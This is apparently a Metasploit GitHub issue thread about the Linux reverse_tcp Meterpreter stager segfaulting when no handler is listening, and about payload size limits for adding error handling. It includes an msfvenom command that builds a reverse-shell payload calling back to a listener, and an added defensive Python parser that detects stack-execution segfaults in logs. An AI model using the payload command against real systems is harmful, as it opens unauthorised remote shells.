If running a meterpreter with no handler on the other side, it segfaults. I think this error should be handled.
To reproduce (tried on kali):
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o /var/www/html/meterpreter LPORT=4444 LHOST=192.168.56.3
chmod +x /var/www/html/meterpreter
/var/www/html/meterpreter
Segmentation fault
Version:
root@kali:~# msfconsole --version
Framework Version: 4.13.6-dev
msf > version
Framework: 4.13.6-dev
Console : 4.13.6-dev
That's been a known issue for aaaages.
I vote that this gets fixed by _not me_.
I also think POSIX Meterpreter will go away soon.
Not an issue with meterpreter, that's the Linux reverse_tcp stager not checking if it connected and received anything before jumping into an empty buffer. Same thing happens with a staged shell.
Alright thanks :) Just wanted to report it in case no one has seen it before
Everyone has seen it. ;)
Real answer: to handle the error would add size to the shellcode. It can be done, but there are other syscalls that might fail, too. Best to have your handler set up first. :-)
@wvu-r7 except me because I always have a listener ready :D
Put your hand up if you got mad skills. :hand: Keep it up if you got mad kills. Make fist if your handler's always ready. :fist: Shout it out. What you roll? Natural twenties!
In other news, I'm disappointed that there is no d20 emoji
How much space would folks be willing to let the linux stager grow to support proper error handling? Segfaults do show up in logs typically, so it can be worth it for stealth reasons. Windows reverse_tcp is a lot bigger so it could be a good tradeoff.
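The point above that a segfault leaves a trace in logs is the defender's side of this thread. As an added example (not code from the issue or from Metasploit), here is a small parser for the Linux kernel's default user-space segfault message (`comm[pid]: segfault at ADDR ip IP sp SP error ERR in obj[base+size]`) with two heuristics that separate an ordinary crash inside a library from the pattern described in this issue: a stager that jumps into a buffer on the stack. The syslog lines, addresses and process names in `SAMPLE_LOG` are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample syslog lines (not taken from the issue). The kernel part follows
# the Linux default format for user-space segfaults:
#   comm[pid]: segfault at ADDR ip IP sp SP error ERR in obj[base+size]
SAMPLE_LOG = """\
Jan 10 12:00:01 host kernel: [ 1234.567890] meterpreter[2017]: segfault at ffffff95 ip bffff3a4 sp bffff3a0 error 6 in meterpreter[8048000+1000]
Jan 10 12:00:05 host kernel: [ 1238.000000] firefox[3000]: segfault at 10 ip 00007f1a2b3c4d5e sp 00007ffc11223344 error 4 in libxul.so[7f1a2a000000+6000000]
Jan 10 12:00:09 host sshd[400]: Accepted publickey for user from 10.0.0.5 port 50000
"""

SEGFAULT_RE = re.compile(
    r"(?P<comm>[^\s\[]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
    r"(?: in (?P<obj>[^\s\[]+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\])?"
)

# x86 page-fault error code bits as reported in the "error N" field.
ERR_PROT, ERR_WRITE, ERR_USER, ERR_RSVD, ERR_INSTR = 1, 2, 4, 8, 16


@dataclass
class Segfault:
    comm: str
    pid: int
    addr: int
    ip: int
    sp: int
    err: int
    obj: Optional[str]
    base: Optional[int]
    size: Optional[int]

    def ip_in_object(self) -> Optional[bool]:
        """True if the faulting ip lies inside the mapping the kernel named; None if none was reported."""
        if self.base is None or self.size is None:
            return None
        return self.base <= self.ip < self.base + self.size

    def ip_near_sp(self, window: int = 0x2000) -> bool:
        """True if ip sits within `window` bytes of sp, i.e. code was running from the stack."""
        return abs(self.ip - self.sp) < window

    def describe_error(self) -> str:
        """Decode the page-fault error bits into a short human-readable string."""
        parts = [
            "user" if self.err & ERR_USER else "kernel",
            "write" if self.err & ERR_WRITE else "read",
            "protection" if self.err & ERR_PROT else "not-present",
        ]
        if self.err & ERR_INSTR:
            parts.append("instruction-fetch")
        return " ".join(parts)


def parse_segfaults(text: str) -> List[Segfault]:
    """Extract every kernel segfault message from a block of syslog/dmesg text."""
    found = []
    for line in text.splitlines():
        m = SEGFAULT_RE.search(line)
        if not m:
            continue
        g = m.groupdict()
        found.append(Segfault(
            comm=g["comm"], pid=int(g["pid"]), addr=int(g["addr"], 16),
            ip=int(g["ip"], 16), sp=int(g["sp"], 16), err=int(g["err"]),
            obj=g["obj"],
            base=int(g["base"], 16) if g["base"] else None,
            size=int(g["size"], 16) if g["size"] else None,
        ))
    return found


def suspicious_reasons(sf: Segfault) -> List[str]:
    """Heuristics for a crash that looks like a jump into a stack buffer rather than a bug inside a library."""
    reasons = []
    if sf.ip_near_sp():
        reasons.append("ip within a page or two of sp: executing code from the stack")
    if sf.ip_in_object() is False:
        reasons.append(f"ip outside the reported mapping {sf.obj}: control left the mapped image")
    return reasons


def scan(text: str) -> List[Tuple[str, int, List[str]]]:
    """Return (comm, pid, reasons) for every segfault that trips at least one heuristic."""
    hits = []
    for sf in parse_segfaults(text):
        reasons = suspicious_reasons(sf)
        if reasons:
            hits.append((sf.comm, sf.pid, reasons))
    return hits


if __name__ == "__main__":
    for sf in parse_segfaults(SAMPLE_LOG):
        print(f"{sf.comm}[{sf.pid}] {sf.describe_error()} fault; flags: {suspicious_reasons(sf) or 'none'}")
```

The `ip_near_sp` window of 0x2000 bytes is a hypothetical threshold chosen for the example; the error-bit decoding follows the x86 page-fault error code layout, and the heuristics only apply to architectures whose kernel emits this message format.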
@busterb it's really up to the exploits. Reliable mem corruption on Linux doesn't come up much these days, but older exploits have some pretty severe size restrictions.
For example:
modules/exploits/linux/smtp/exim_gethostbyname_bof.rb: 'Space' => 255, # the shorter the payload, the higher the probability of code execution
I modified ./tools/modules/module_targets.rb to print Space as well and with a little command line magic, came up with these counts:
1 130
1 200
4 220
1 250
1 256
1 300
1 466
1 500
3 512
1 964
3 1000
23 1024
1 1036
1 1536
9 2048
1 2060
2 4000
2 4096
1 5000
1 8000
2 8192
5 10000
16 20480
1 60000
2 65535
Current reverse_tcp stager is 71 bytes and the smallest needed for an exploit is 130, so I feel like a little error handling should fit.
I think this issue has been resolved.